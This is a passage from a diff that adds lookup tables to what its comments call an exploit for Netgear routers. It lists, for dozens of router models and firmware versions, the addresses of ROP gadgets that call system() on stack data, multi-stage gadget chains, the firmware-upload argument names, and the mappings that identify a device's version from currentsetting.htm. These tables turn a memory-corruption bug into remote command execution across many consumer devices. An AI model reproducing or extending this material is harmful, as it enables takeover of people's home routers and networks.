+ "1.0.3.10" : 0x36c80,
+ "1.0.3.8" : 0x365b0,
+ "1.0.2.16" : 0x36110,
+ "1.0.2.10" : 0x346d8,
+ "1.0.1.26" : 0x34028,
+ "1.0.1.18" : 0x33fe4,
+ "1.0.1.12" : 0x336f8,
+ "1.0.1.8" : 0x332dc,
+ "1.0.1.4" : 0x33058,
+ "1.0.0.10" : 0x3290c,
+ "1.0.0.8" : 0x326ec,
+ "1.0.0.6" : 0x2f48c,
+ "1.0.0.2" : 0x2f470,
+ },
+ "R8000" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.46" : 0x36dac,
+ "1.0.4.28" : 0x365b0,
+ "1.0.4.18" : 0x36110,
+ "1.0.4.12" : 0x346d8,
+ "1.0.4.4" : 0x34310,
+ "1.0.4.2" : 0x34284,
+ "1.0.3.54" : 0x34028,
+ "1.0.3.48" : 0x33fe4,
+ "1.0.3.46" : 0x33e84,
+ "1.0.3.36" : 0x33ac4,
+ "1.0.3.32" : 0x336f8,
+ "1.0.3.26" : 0x332dc,
+ "1.0.3.4" : 0x33058,
+ "1.0.2.46" : 0x3290c,
+ "1.0.2.44" : 0x326f4,
+ "1.0.1.16" : 0x2f370,
+ "1.0.0.110" : 0x2f2a0,
+ "1.0.0.108" : 0x2f2a8,
+ "1.0.0.102" : 0x2f2a0,
+ "1.0.0.100" : 0x2f0f0,
+ "1.0.0.90" : 0x2f0e8,
+ "1.0.0.76" : 0x2f0ac,
+ "1.0.0.74" : 0x2f068,
+ "1.0.0.68" : 0x2f0ac,
+ "1.0.0.46" : 0x2f0ac,
+ },
+ "R8300" : {
+ # 0) gadget: calls system($sp)
+ "1.0.2.130" : 0x35B18,
+ "1.0.2.128" : 0x35B18,
+ "1.0.2.122" : 0x355fc,
+ "1.0.2.116" : 0x35258,
+ "1.0.2.106" : 0x34f40,
+ "1.0.2.100" : 0x34d38,
+ "1.0.2.94" : 0x34d8c,
+ "1.0.2.86" : 0x348b8,
+ "1.0.2.80" : 0x348b8,
+ "1.0.2.48" : 0x340b8,
+ },
+ "R8500" : {
+ # 0) gadget: calls system($sp)
+ "1.0.2.130" : 0x35b18,
+ "1.0.2.128" : 0x35B18,
+ "1.0.2.122" : 0x355fc,
+ "1.0.2.116" : 0x35258,
+ "1.0.2.106" : 0x34f40,
+ "1.0.2.100" : 0x34d38,
+ "1.0.2.94" : 0x34d8c,
+ "1.0.2.86" : 0x348b8,
+ "1.0.2.80" : 0x348b8,
+ "1.0.2.64" : 0x34104,
+ "1.0.2.54" : 0x33f30,
+ "1.0.2.30" : 0x33dd4,
+ "1.0.2.26" : 0x33d9c,
+ "1.0.0.56" : 0x33da8,
+ "1.0.0.52" : 0x33da8,
+ "1.0.0.42" : 0x33da8,
+ "1.0.0.28" : 0x33da8,
+ },
+ "RS400" : {
+ # 0) gadget: calls system($sp)
+ "1.5.0.34" : 0x10120,
+ },
+ "WGR614V8" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.2.10" : 0x43B9C0,
+ "1.2.10NA" : 0x43B9C0,
+ "1.1.24" : 0x43A46C,
+ "1.1.24NA" : 0x43A46C,
+ "1.1.2" : 0x438DAC,
+ "1.1.2NA" : 0x438DCC,
+ "1.1.11" : 0x43A56C,
+ "1.1.11NA" : 0x43A56C,
+ "1.1.1NA" : 0x438A8C,
+ "1.1.20" : 0x43A56C,
+ "1.1.20NA" : 0x43A56C,
+ },
+ "WGR614V9" : {
+ # 0) gadget: calls system($sp+0x30)
+ "1.2.32" : 0x450280,
+ "1.2.32NA" : 0x450290,
+ "1.2.30" : 0x450280,
+ "1.2.30NA" : 0x450290,
+ "1.2.24" : 0x44E730,
+ "1.2.24NA" : 0x44E750,
+ "1.2.6" : 0x44C72C,
+ "1.2.6NA" : 0x44C74C,
+ "1.2.2" : 0x44D1BC,
+ "1.2.2NA" : 0x44D1DC,
+ "1.0.18" : 0x450E3C,
+ "1.0.18NA" : 0x450D8C,
+ "1.0.15" : 0x44FD60,
+ "1.0.15NA" : 0x44FDA0,
+ "1.0.9NA" : 0x44EE40,
+ },
+ "WGR614V10" : {
+ # 0) gadget: calls system($sp+0x30)
+ "1.0.2.66" : 0x480294,
+ "1.0.2.66NA" : 0x47FEEC,
+ "1.0.2.60" : 0x47F6CC,
+ "1.0.2.60NA" : 0x47FA94,
+ "1.0.2.58NA" : 0x47FA94,
+ "1.0.2.54" : 0x4775B4,
+ "1.0.2.54NA" : 0x4775B4,
+ "1.0.2.26" : 0x46A5E4,
+ "1.0.2.26NA" : 0x46A5F4,
+ "1.0.2.18" : 0x467D7C,
+ "1.0.2.18NA" : 0x467D8C,
+ },
+ "WGT624V4" : {
+ # 0) gadget: calls system($sp+0x18)
+ "2.0.13.2" : 0x42AFF4,
+ "2.0.13" : 0x42AFF4,
+ "2.0.13NA" : 0x42AFF4,
+ "2.0.12" : 0x42AFA4,
+ "2.0.12NA" : 0x42AFA4,
+ "2.0.6NA" : 0x42A1F4,
+ },
+ "WN2500RP" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.30" : 0x44E780,
+ "1.0.0.26" : 0x44E780,
+ "1.0.0.24" : 0x44E780,
+ },
+ "WN2500RPV2" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.1.54" : 0x46335C,
+ "1.0.1.50" : 0x462AFC,
+ "1.0.1.46" : 0x460E54,
+ "1.0.1.42" : 0x460D44,
+ "1.0.0.30" : 0x44A804,
+ },
+ "WN3000RP" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s3 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.2.64" : [0x443048, 0x40EA14],
+
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.1.36" : 0x4395e0,
+ "1.0.1.34" : 0x4395d0,
+ "1.0.1.18" : 0x438440,
+ "1.0.0.12" : 0x445370,
+ },
+ "WN3100RP" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.20" : 0x439750,
+ "1.0.0.16" : 0x439550,
+ "1.0.0.14" : 0x439290,
+ "1.0.0.6" : 0x439400,
+ },
+ "WN3500RP" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.22" : [0x436BC4, 0x415C68],
+ "1.0.0.20" : [0x436BD4, 0x415C98],
+ "1.0.0.18" : [0x436BA4, 0x415C40],
+ "1.0.0.16" : [0x436C74, 0x415BF0],
+ "1.0.0.14" : [0x436E44, 0x415D90],
+ "1.0.0.12" : [0x436DC4, 0x415D90],
+ },
+ "WNCE3001" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.50" : 0x412c68,
+ "1.0.0.46" : 0x412c68,
+ "1.0.0.44" : 0x412c68,
+ "1.0.0.38" : 0x412bb8,
+ },
+ "WNDR3300" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.45" : 0x432C6C,
+ "1.0.45NA" : 0x432C6C,
+ "1.0.29" : 0x431EDC,
+ "1.0.29NA" : 0x431EDC,
+ "1.0.27NA" : 0x4389EC,
+ "1.0.26" : 0x4388CC,
+ "1.0.26NA" : 0x4388CC,
+ "1.0.23NA" : 0x43919C,
+ "1.0.14" : 0x438A8C,
+ "1.0.14NA" : 0x438A8C,
+ },
+ "WNDR3300V2" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.26" : 0x448020,
+ },
+ "WNDR3400" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.52" : [0x490950, 0x412DF8],
+ "1.0.0.50" : [0x4908C0, 0x412DF8],
+
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.38" : 0x4B6880,
+ "1.0.0.34" : 0x4B6320,
+ },
+ "WNDR3400V2" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.0.54" : 0x44858C,
+ "1.0.0.52" : 0x44848C,
+ "1.0.0.38" : 0x44632C,
+ "1.0.0.34" : 0x44629C,
+ "1.0.0.16" : 0x4420DC,
+ "1.0.0.12" : 0x4420DC,
+ },
+ "WNDR3400V3" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.1.24" : 0x44C4BC,
+ "1.0.1.22" : 0x44BFFC,
+ "1.0.1.18" : 0x44BABC,
+ "1.0.1.16" : 0x44B7EC,
+ "1.0.1.14" : 0x44B53C,
+ "1.0.1.12" : 0x44929C,
+ "1.0.1.8" : 0x448CEC,
+ "1.0.1.4" : 0x448A2C,
+ "1.0.1.2" : 0x448A2C,
+ "1.0.0.48" : 0x448A2C,
+ "1.0.0.46" : 0x448A2C,
+ "1.0.0.38" : 0x44717C,
+ "1.0.0.22" : 0x44626C,
+ "1.0.0.20" : 0x44623C,
+ },
+ "WNDR3700V3" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.42" : [0x610070+0x72c, 0x40BB10, 0x4206FC],
+ "1.0.0.38" : [0x60e3d0+0x71c, 0x40BA14, 0x41FB70],
+ "1.0.0.36" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0],
+ "1.0.0.30" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0],
+ "1.0.0.22" : [0x608f50+0x720, 0x40B868, 0x41F6A0],
+
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.18" : [0x490590, 0x490550],
+ },
+ "WNDR4000" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.2.10" : [0x6397f0+0x73c, 0x40BBC8, 0x420E6C],
+ "1.0.2.6" : [0x60ffe0+0x72c, 0x40BAB4, 0x42066C],
+ "1.0.2.4" : [0x60e040+0x720, 0x40B9B0, 0x41FB50],
+ "1.0.2.2" : [0x60da60+0x720, 0x40B91C, 0x41F8E0],
+ "1.0.0.94" : [0x60da60+0x720, 0x40B91C, 0x41F8E0],
+ "1.0.0.90" : [0x60cfa0+0x71c, 0x40B8C0, 0x41F890],
+ "1.0.0.88" : [0x608f20+0x71c, 0x40B844, 0x41F680],
+
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.82" : [0x490860, 0x490820],
+ "1.0.0.66" : [0x48CDC0, 0x48CD80],
+ },
+ "WNDR4500" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.1.46" : 0x447D5C,
+ "1.0.1.40" : 0x44719C,
+ "1.0.1.38" : 0x4460ec,
+ "1.0.1.36" : 0x4460ec,
+ "1.0.1.20" : 0x4459fc,
+ "1.0.1.18" : 0x44584C,
+ "1.0.1.6" : 0x4430dc,
+ "1.0.0.58" : 0x44257C,
+ "1.0.0.50" : 0x44257c,
+ "1.0.0.40" : 0x44257c,
+ },
+ "WNDR4500V2" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.0.72" : 0x45005C,
+ "1.0.0.68" : 0x44FF2C,
+ "1.0.0.64" : 0x44F99C,
+ "1.0.0.62" : 0x44F09C,
+ "1.0.0.60" : 0x44EE5C,
+ "1.0.0.56" : 0x44EE5C,
+ "1.0.0.54" : 0x44E0FC,
+ "1.0.0.50" : 0x44D6DC,
+ "1.0.0.42" : 0x44D6DC,
+ "1.0.0.36" : 0x4467EC,
+ "1.0.0.26" : 0x44621C,
+ },
+ "WNR834BV2" : {
+ # 0) gadget: calls system($sp+0x18)
+ "2.1.13" : 0x43902C,
+ "2.1.13NA" : 0x43902C,
+ "2.0.8" : 0x43894C,
+ "2.0.8NA" : 0x43894C,
+ "1.0.32" : 0x43799C,
+ "1.0.32NA" : 0x43799C,
+ },
+ "WNR1000V3" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.2.72" : 0x460060,
+ "1.0.2.72NA" : 0x460060,
+ "1.0.2.68" : 0x45F604,
+ "1.0.2.68NA" : 0x45F604,
+ "1.0.2.62" : 0x454BB4,
+ "1.0.2.62NA" : 0x454BB4,
+ "1.0.2.60" : 0x454BB4,
+ "1.0.2.60NA" : 0x454BB4,
+ "1.0.2.54" : 0x450ED0,
+ "1.0.2.54NA" : 0x450ED0,
+ "1.0.2.28" : 0x4448A0,
+ "1.0.2.28NA" : 0x4448A0,
+ "1.0.2.26" : 0x4446A0,
+ "1.0.2.26NA" : 0x4446A0,
+ "1.0.2.18" : 0x442D50,
+ "1.0.2.18NA" : 0x442D50,
+ "1.0.2.4" : 0x440F70,
+ },
+ "WNR2000V2" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.2.0.8" : 0x434D04,
+ "1.2.0.8NA" : 0x434CF4,
+ "1.2.0.6" : 0x433F34,
+ "1.2.0.6NA" : 0x433F34,
+ "1.2.0.4" : 0x433EA4,
+ "1.2.0.4NA" : 0x433E94,
+
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.0.40" : 0x4446A0,
+ "1.0.0.40NA" : 0x4446A0,
+ "1.0.0.35" : 0x43F340,
+ "1.0.0.34" : 0x43F340,
+ "1.0.0.34NA" : 0x43F340,
+ },
+ "WNR3500" : {
+ # 0) gadget: calls system($sp)
+ "1.0.36NA" : 0x2CBD0,
+ "1.0.30" : 0x2a714,
+ "1.0.29NA" : 0x2a72c,
+ "1.0.22" : 0x2a4c4,
+ "1.0.22NA" : 0x2a4fc,
+ "1.0.15NA" : 0x2a3c8,
+ "1.0.10NA" : 0x2a1f4,
+ },
+ "WNR3500V2" : {
+ # 0) gadget: calls system($sp+0xac)
+ "1.2.2.28" : 0x435FA0,
+ "1.2.2.28NA" : 0x435F60,
+
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.2.14" : 0x48D1EC,
+ "1.0.2.14NA" : 0x48CFAC,
+ "1.0.2.10" : 0x484D5C,
+ "1.0.2.10NA" : 0x484B1C,
+ "1.0.0.64" : 0x4350DC,
+ "1.0.0.64NA" : 0x4350DC,
+ },
+ "WNR3500L" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # 2) gadget: set $a0 to $sp+0x40, and calls memset
+ "1.2.2.48NA" : [0x5740f0+0x630, 0x409830, 0x409D30],
+ "1.2.2.44" : [0x5740f0+0x630, 0x409830, 0x409D30],
+ "1.2.2.44NA" : [0x5740f0+0x630, 0x409830, 0x409D30],
+ "1.2.2.40" : [0x568490+0x618, 0x4095AC, 0x409AB4],
+ "1.2.2.40NA" : [0x568360+0x618, 0x4095AC, 0x409AB4],
+ "1.2.2.30" : [0x568490+0x618, 0x4095AC, 0x409AB4],
+ "1.2.2.30NA" : [0x568360+0x618, 0x4095AC, 0x409AB4],
+
+ # 0) gadget: calls system($sp+0x18)
+ "1.0.2.50" : 0x4A6574,
+ "1.0.2.50NA" : 0x4A6334,
+ "1.0.2.26" : 0x4A3B7C,
+ "1.0.2.26NA" : 0x4A392C,
+ "1.0.0.88" : 0x438564,
+ "1.0.0.88NA" : 0x438564,
+ "1.0.0.86" : 0x438564,
+ "1.0.0.86NA" : 0x438564,
+ },
+ "WNR3500LV2" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x80 and calls $t9
+ "1.2.0.56" : [0x4458F8, 0x4A6EDC],
+ "1.2.0.54" : [0x4456C8, 0x4A6BEC],
+ "1.2.0.50" : [0x445578, 0x4A68EC],
+ "1.2.0.48" : [0x445268, 0x4A4814],
+ "1.2.0.46" : [0x444BF8, 0x4A4098],
+ "1.2.0.44" : [0x445038, 0x4A3C18],
+ "1.2.0.40" : [0x443C28, 0x4A2808],
+ "1.2.0.38" : [0x443C18, 0x4A2718],
+ "1.2.0.34" : [0x4436F8, 0x4A1674],
+ "1.2.0.32" : [0x4436F8, 0x4A1674],
+ "1.2.0.28" : [0x4436F8, 0x4A1684],
+ "1.2.0.26" : [0x4436F8, 0x4A1684],
+ "1.2.0.20" : [0x43A8B8, 0x492D00],
+ "1.2.0.18" : [0x43A8B8, 0x492D00],
+ "1.2.0.16" : [0x43A8B8, 0x492D00],
+ "1.0.0.14" : [0x43758C, 0x48A850],
+
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.10" : [0x4371FC, 0x4177B0],
+ },
+ "XR300" : {
+ # 0) gadget: calls system($sp)
+ "1.0.3.38" : 0x33258,
+ "1.0.3.34" : 0x33258,
+ "1.0.3.26" : 0x329b0,
+ "1.0.2.24" : 0x329a4,
+ "1.0.2.18" : 0x32a84,
+ "1.0.1.4" : 0x325dc,
+ },
+}
+
+# Devices that are big endian
+big_endian_devices = ["D6220", "D6300", "D6400", "D7000V2", "DGN2200", "DGN2200M", "DGN2200V4", "DGND3700", "MBM621",
+ "MBRN3000", "WGT624V4", "WNCE3001"]
+
+# The argument name for the file upload. If not listed, it's mtenFWUpload
+# It would be real nice if Netgear could standardize on how they update, so I could
+# make the exploit work everywhere without handling a dozen corner cases.
+argument_names = {
+ "EX3700" : {
+ "1.0.0.22" : "update_file",
+ "1.0.0.24" : "update_file",
+ "1.0.0.26" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.34" : "update_file",
+ "1.0.0.44" : "update_file",
+ "1.0.0.46" : "update_file",
+ "1.0.0.48" : "update_file",
+ "1.0.0.50" : "update_file",
+ "1.0.0.58" : "update_file",
+ "1.0.0.62" : "update_file",
+ "1.0.0.64" : "update_file",
+ "1.0.0.68" : "update_file",
+ "1.0.0.70" : "update_file",
+ "1.0.0.72" : "update_file",
+ "1.0.0.76" : "update_file",
+ "1.0.0.78" : "update_file",
+ },
+ "EX3800" : {
+ "1.0.0.26" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.34" : "update_file",
+ "1.0.0.44" : "update_file",
+ "1.0.0.46" : "update_file",
+ "1.0.0.48" : "update_file",
+ "1.0.0.50" : "update_file",
+ "1.0.0.58" : "update_file",
+ "1.0.0.62" : "update_file",
+ "1.0.0.64" : "update_file",
+ "1.0.0.68" : "update_file",
+ "1.0.0.70" : "update_file",
+ "1.0.0.72" : "update_file",
+ "1.0.0.76" : "update_file",
+ "1.0.0.78" : "update_file",
+ },
+ "EX3920" : {
+ "1.0.0.26" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.34" : "update_file",
+ "1.0.0.44" : "update_file",
+ "1.0.0.46" : "update_file",
+ "1.0.0.48" : "update_file",
+ "1.0.0.50" : "update_file",
+ "1.0.0.58" : "update_file",
+ "1.0.0.62" : "update_file",
+ "1.0.0.64" : "update_file",
+ "1.0.0.68" : "update_file",
+ "1.0.0.70" : "update_file",
+ "1.0.0.72" : "update_file",
+ "1.0.0.76" : "update_file",
+ "1.0.0.78" : "update_file",
+ },
+ "EX6000" : {
+ "1.0.0.10" : "update_file",
+ "1.0.0.20" : "update_file",
+ "1.0.0.24" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.30" : "update_file",
+ "1.0.0.32" : "update_file",
+ "1.0.0.38" : "update_file",
+ },
+ "EX6100" : {
+ "1.0.2.6" : "update_file",
+ "1.0.1.36" : "update_file",
+ "1.0.2.16" : "update_file",
+ "1.0.2.18" : "update_file",
+ "1.0.2.24" : "update_file",
+ },
+ "EX6120" : {
+ "1.0.0.4" : "update_file",
+ "1.0.0.8" : "update_file",
+ "1.0.0.14" : "update_file",
+ "1.0.0.16" : "update_file",
+ "1.0.0.26" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.30" : "update_file",
+ "1.0.0.32" : "update_file",
+ "1.0.0.36" : "update_file",
+ "1.0.0.40" : "update_file",
+ "1.0.0.42" : "update_file",
+ "1.0.0.46" : "update_file",
+ "1.0.0.48" : "update_file",
+ },
+ "EX6130" : {
+ "1.0.0.12" : "update_file",
+ "1.0.0.16" : "update_file",
+ "1.0.0.20" : "update_file",
+ "1.0.0.22" : "update_file",
+ "1.0.0.24" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.30" : "update_file",
+ },
+ "EX6150" : {
+ "1.0.0.14" : "updateFile",
+ "1.0.0.16" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.32" : "update_file",
+ "1.0.0.34" : "update_file",
+ "1.0.0.42" : "update_file",
+ },
+ "EX6200" : {
+ "1.0.3.68" : "update_file",
+ "1.0.3.74" : "update_file",
+ "1.0.3.76" : "update_file",
+ "1.0.3.82" : "update_file",
+ "1.0.3.88" : "update_file",
+ "1.0.3.90" : "update_file",
+ },
+ "EX6920" : {
+ "1.0.0.4" : "update_file",
+ "1.0.0.8" : "update_file",
+ "1.0.0.14" : "update_file",
+ "1.0.0.16" : "update_file",
+ "1.0.0.26" : "update_file",
+ "1.0.0.28" : "update_file",
+ "1.0.0.30" : "update_file",
+ "1.0.0.32" : "update_file",
+ "1.0.0.36" : "update_file",
+ "1.0.0.40" : "update_file",
+ },
+ "EX7000" : {
+ "1.0.0.30" : "updateFile",
+ "1.0.0.32" : "updateFile",
+ "1.0.0.36" : "update_file",
+ "1.0.0.38" : "update_file",
+ "1.0.0.42" : "update_file",
+ "1.0.0.50" : "update_file",
+ "1.0.0.56" : "update_file",
+ "1.0.0.58" : "update_file",
+ "1.0.0.62" : "update_file",
+ "1.0.0.66" : "update_file",
+ "1.0.1.78" : "update_file",
+ "1.0.1.80" : "update_file",
+ "1.0.1.84" : "update_file",
+ },
+ "WN2500RPV2" : {
+ "1.0.1.42" : "update_file",
+ "1.0.1.46" : "update_file",
+ "1.0.1.50" : "update_file",
+ "1.0.1.54" : "update_file",
+ },
+}
+
+# A mapping of human friendly versions to the versions returned by currentsetting.htm
+firmware_version_to_human_version = {
+ "AC1450" : {
+ "V1.0.0.36_10.0.17" : "1.0.0.36",
+ "V1.0.0.34_10.0.16" : "1.0.0.34",
+ "V1.0.0.22_1.0.10" : "1.0.0.22",
+ "V1.0.0.14_1.0.6" : "1.0.0.14",
+ "V1.0.0.8_1.0.4" : "1.0.0.8",
+ "V1.0.0.6_1.0.3" : "1.0.0.6",
+ },
+ "D6220" : {
+ "V1.0.0.52_1.0.52" : "1.0.0.52",
+ "V1.0.0.48_1.0.48" : "1.0.0.48",
+ "V1.0.0.46_1.0.46" : "1.0.0.46",
+ "V1.0.0.44_1.0.44" : "1.0.0.44",
+ "V1.0.0.40_1.0.40" : "1.0.0.40",
+ "V1.0.0.36_1.0.36" : "1.0.0.36",
+ "V1.0.0.34_1.0.34" : "1.0.0.34",
+ "V1.0.0.32_1.0.32" : "1.0.0.32",
+ "V1.0.0.28_1.0.28" : "1.0.0.28",
+ "V1.0.0.24_1.0.24" : "1.0.0.24",
+ "V1.0.0.22_1.0.22" : "1.0.0.22",
+ "V1.0.0.16_1.0.16" : "1.0.0.16",
+ },
+ "D6300" : {
+ "V1.0.0.102_1.0.102" : "1.0.0.102",
+ "V1.0.0.96_1.1.96" : "1.0.0.96",
+ "V1.0.0.90_1.0.90" : "1.0.0.90",
+ "V1.0.0.88-1.0.88" : "1.0.0.88",
+ "V1.0.0.76_1.0.76" : "1.0.0.76",
+ "V1.0.0.72_1.0.72" : "1.0.0.72",
+ "V1.0.0.42_1.0.42" : "1.0.0.42",
+ "V1.0.0.30_1.0.30" : "1.0.0.30",
+ "V1.0.0.24_1.0.24" : "1.0.0.24",
+ "V1.0.0.16_1.0.16" : "1.0.0.16",
+ },
+ "D6400" : {
+ "V1.0.0.88_1.0.88" : "1.0.0.88",
+ "V1.0.0.86_1.0.86" : "1.0.0.86",
+ "V1.0.0.82_1.0.82" : "1.0.0.82",
+ "V1.0.0.80_1.0.80" : "1.0.0.80",
+ "V1.0.0.78_1.0.78" : "1.0.0.78",
+ "V1.0.0.74_1.0.74" : "1.0.0.74",
+ "V1.0.0.70_1.0.70" : "1.0.0.70",
+ "V1.0.0.68_1.0.68" : "1.0.0.68",
+ "V1.0.0.66_1.0.66" : "1.0.0.66",
+ "V1.0.0.60_1.0.60" : "1.0.0.60",
+ "V1.0.0.58_1.0.58" : "1.0.0.58",
+ "V1.0.0.56_1.0.56" : "1.0.0.56",
+ "V1.0.0.54_1.0.54" : "1.0.0.54",
+ "V1.0.0.52_1.0.52" : "1.0.0.52",
+ "V1.0.0.44_1.0.44" : "1.0.0.44",
+ "V1.0.0.38_1.1.38" : "1.0.0.38",
+ "V1.0.0.34_1.3.34" : "1.0.0.34",
+ "V1.0.0.22_1.0.22" : "1.0.0.22",
+ },
+ "D7000V2" : {
+ "V1.0.0.56_1.0.1" : "1.0.0.56",
+ "V1.0.0.53_1.0.2" : "1.0.0.53",
+ "V1.0.0.52_1.0.1" : "1.0.0.52",
+ "V1.0.0.51_1.0.1" : "1.0.0.51",
+ "V1.0.0.47_1.0.1" : "1.0.0.47",
+ "V1.0.0.45_1.0.1" : "1.0.0.45",
+ "V1.0.0.44_1.0.1" : "1.0.0.44",
+ "V1.0.0.40_1.0.1" : "1.0.0.40",
+ "V1.0.0.38_1.0.1" : "1.0.0.38",
+ },
+ "D8500" : {
+ # Version 1.0.3.29 has stack cookies which will block the
+ # exploit. However, Netgear stopped using stack cookies
+ # after this version.
+ "V1.0.3.44_1.0.1" : "1.0.3.44",
+ "V1.0.3.43_1.0.1" : "1.0.3.43",
+ "V1.0.3.42_1.0.1" : "1.0.3.42",
+ "V1.0.3.39_1.0.1" : "1.0.3.39",
+ "V1.0.3.36_1.0.1" : "1.0.3.36",
+ "V1.0.3.35_1.0.1" : "1.0.3.35",
+ "V1.0.3.28_1.0.1" : "1.0.3.28",
+ "V1.0.3.27_1.0.1" : "1.0.3.27",
+ "V1.0.3.25_1.0.1" : "1.0.3.25",
+ },
+ "DC112A" : {
+ "V1.0.0.44_1.0.60" : "1.0.0.44",
+ "V1.0.0.30_1.0.60" : "1.0.0.30",
+ "V1.0.0.24_1.0.60" : "1.0.0.24",
+ },
+ "DGN2200" : {
+ "V1.0.0.58_7.0.57" : "1.0.0.58",
+ "V1.0.0.57_7.0.57" : "1.0.0.57",
+ "V1.0.0.55_7.0.55" : "1.0.0.55",
+ "V1.0.0.52_7.0.52" : "1.0.0.52",
+ "V1.0.0.50_7.0.50NA" : "1.0.0.50NA",
+ "V1.0.0.36_7.0.36NA" : "1.0.0.36NA",
+ "V1.0.0.36_7.0.36" : "1.0.0.36",
+ },
+ "DGN2200M" : {
+ "V1.0.0.37_1.0.21WW" : "1.0.0.37",
+ "V1.0.0.35_1.0.21WW" : "1.0.0.35",
+ "V1.0.0.35_1.0.21NA" : "1.0.0.35NA",
+ "V1.0.0.33_1.0.21WW" : "1.0.0.33",
+ "V1.0.0.33_1.0.21NA" : "1.0.0.33NA",
+ "V1.0.0.26_1.0.20WW" : "1.0.0.26",
+ "V1.0.0.24_1.0.20NA" : "1.0.0.24NA",
+ },
+ "DGN2200V4" : {
+ "V1.0.0.110_1.0.110" : "1.0.0.110",
+ "V1.0.0.108_1.0.108" : "1.0.0.108",
+ "V1.0.0.102_1.0.102" : "1.0.0.102",
+ "V1.0.0.98_1.0.98" : "1.0.0.98",
+ "V1.0.0.90_1.0.90" : "1.0.0.90",
+ "V1.0.0.86_1.0.86" : "1.0.0.86",
+ "V1.0.0.82_1.0.82" : "1.0.0.82",
+ "V1.0.0.76_1.0.76" : "1.0.0.76",
+ "V1.0.0.66_1.0.66" : "1.0.0.66",
+ "V1.0.0.62_1.0.62" : "1.0.0.62",
+ "V1.0.0.58_1.0.58" : "1.0.0.58",
+ "V1.0.0.46_1.0.46" : "1.0.0.46",
+ "V1.0.0.24_5.0.8" : "1.0.0.24",
+ "V1.0.0.5_5.0.3" : "1.0.0.5",
+ },
+ "DGND3700" : {
+ "V1.0.0.17_1.0.17" : "1.0.0.17",
+ "V1.0.0.17_1.0.17NA" : "1.0.0.17NA",
+ "V1.0.0.12_1.0.12" : "1.0.0.12",
+ "V1.0.0.12_1.0.12NA" : "1.0.0.12NA",
+ },
+ "EX3700" : {
+ "V1.0.0.78_1.0.51" : "1.0.0.78",
+ "V1.0.0.76_1.0.49" : "1.0.0.76",
+ "V1.0.0.72_1.0.47" : "1.0.0.72",
+ "V1.0.0.70_1.0.46" : "1.0.0.70",
+ "V1.0.0.68_1.0.45" : "1.0.0.68",
+ "V1.0.0.64_1.0.43" : "1.0.0.64",
+ "V1.0.0.62_1.0.42" : "1.0.0.62",
+ "V1.0.0.58_1.0.38" : "1.0.0.58",
+ "V1.0.0.50_1.0.30" : "1.0.0.50",
+ "V1.0.0.48_1.0.28" : "1.0.0.48",
+ "V1.0.0.46_1.0.26" : "1.0.0.46",
+ "V1.0.0.44_1.0.22" : "1.0.0.44",
+ "V1.0.0.34_1.0.22" : "1.0.0.34",
+ "V1.0.0.28_1.0.20" : "1.0.0.28",
+ "V1.0.0.26_1.0.19" : "1.0.0.26",
+ "V1.0.0.24_1.0.18" : "1.0.0.24",
+ "V1.0.0.22_1.0.17" : "1.0.0.22",
+ },
+ "EX3800" : {
+ "V1.0.0.78_1.0.51" : "1.0.0.78",
+ "V1.0.0.76_1.0.49" : "1.0.0.76",
+ "V1.0.0.72_1.0.47" : "1.0.0.72",
